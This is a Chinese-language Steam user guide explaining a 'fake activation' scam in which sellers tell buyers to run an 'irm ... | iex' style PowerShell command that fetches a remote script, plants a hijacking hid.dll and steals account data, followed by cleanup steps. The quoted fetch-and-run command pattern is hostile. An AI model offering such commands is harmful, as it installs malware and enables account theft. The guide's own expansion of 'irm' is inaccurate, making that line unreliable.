[Steam教程]关于假入库的某些特征和解决方法
以下是商家所谓的激活步骤:第一步:按住win+x,找到powershell(管理员) (A) ,在弹出的对话框中直接输入irm steam-install。xxxxXx (切记要复制,不要手动输入,不要复制前后字符或空格),按回车,成功了会自动打开steam。这种不能直接输入,都是假的,找淘宝客服(别先找商家)退款! ! !
什么是假入库
就是通过脚本篡改steam本身的dll实现”激活码入库“,实际上就是骗过steam让你把游戏下载下来了,同时这个脚本会给你的电脑下载木马病毒,盗取你的账号密码等等,篡改你的steam如果你去找商家退款,他就会用病毒要挟你,让你被封号红信,所以不要马上去找商家
1. 核心诈骗手段分析:irm steam-install...
说法:“按住win+x...输入irm steam-install...切记要复制...”
原理:
irm 是 PowerShell 命令 Invoke-RestWebRequest 的缩写。它的作用是从互联网上下载一个文件。
这类诈骗通常完整的命令是 irm ... | iex(或者脚本内部包含执行逻辑)。这就相当于商家让你直接从他的服务器下载一个未知脚本并在你的电脑上以管理员权限运行。
2. 所谓的“假入库”原理
说法:“通过脚本篡改steam本身的dll实现...下载木马病毒...”
原理:
这就是利用了 DLL劫持(DLL Hijacking) 技术。
Steam 正常运行需要调用一些系统库。脚本会下载一个修改过的恶意 DLL 文件(文中提到的 hid.dll 或常见的 version.dll)放在 Steam 的安装目录下。
当 Steam 启动时,它会优先加载目录下的这个“假 DLL”。这个假文件会欺骗 Steam,让 Steam 以为你拥有某些并没有购买的游戏(类似于“破解”补丁的原理)。
同时,这个 DLL 可以作为一个后门,在后台静默上传你的数据。
这种入库的游戏虽然能下载,但通常无法联机,且随时可能失效,最重要的是你的账号和电脑安全已经裸奔。
3. 检查和处理
按住win+x,找到powershell(管理员运行), 在弹出的对话框中输入:
Get-ExecutionPolicy
回车运行,看是不是提示Restricted或者是Remotesigned,如果是Unstrict,你肯定被动手脚了。就算是Restricted,还是建议你继续下述步骤。
Set-ExecutionPolicy Restricted回车运行,重复步骤1
检查执行策略 (Get-ExecutionPolicy):
原理:PowerShell 默认通常是 Restricted(受限)或 RemoteSigned,不允许随意运行未签名的脚本。病毒脚本为了持久化运行,通常会将其改为 Unrestricted(无限制)。
打开我的电脑,找到steam安装的文件夹(不是游戏库位置,但是建议把游戏卸载),搜索找到hid.dll文件
右键删除这个文件,再重复一遍步骤1,确认是Restricted后再继续
删除 hid.dll:
原理:正常的 Steam 安装目录根文件夹下,不应该存在 hid.dll 这个文件(这个文件一般只存在于 Windows 系统目录 System32 中)。如果 Steam 目录下有,那就很有可能是病毒文件/破解补丁。
打开你的杀毒软件,来一个全盘杀毒,就算杀一个小时也无所谓了,你的计算机安全最要紧,不要嫌麻烦。慢慢等杀毒完成
重新下一次steam(各位应该不会下盗版)登录后在设置里取消对所有设备的授权,防止商家已经偷偷登录了你的账号,然后必须改一次密码,狠一点可以给自己上个家庭监护密码,这样你的库存应该就不会被偷偷卖出。
重装 Steam & 取消授权:
原理:重装能确保所有被篡改的二进制文件恢复原状(除了用户数据)。取消授权是为了防止黑客窃取了你的 登录令牌后,在你不知情的情况下利用“免密登录”盗号。
值得注意的点:如果你开通了Steam API Key
登录 Steam 网页版,访问 https://steamcommunity.com/dev/apikey。
如果这里有一个你不知道的 API Key,立即撤销(Revoke)。黑客常利用 API Key 劫持你的交易,把你要卖的饰品转移走。
没开通的也要检查一下防止利用
评论 (0)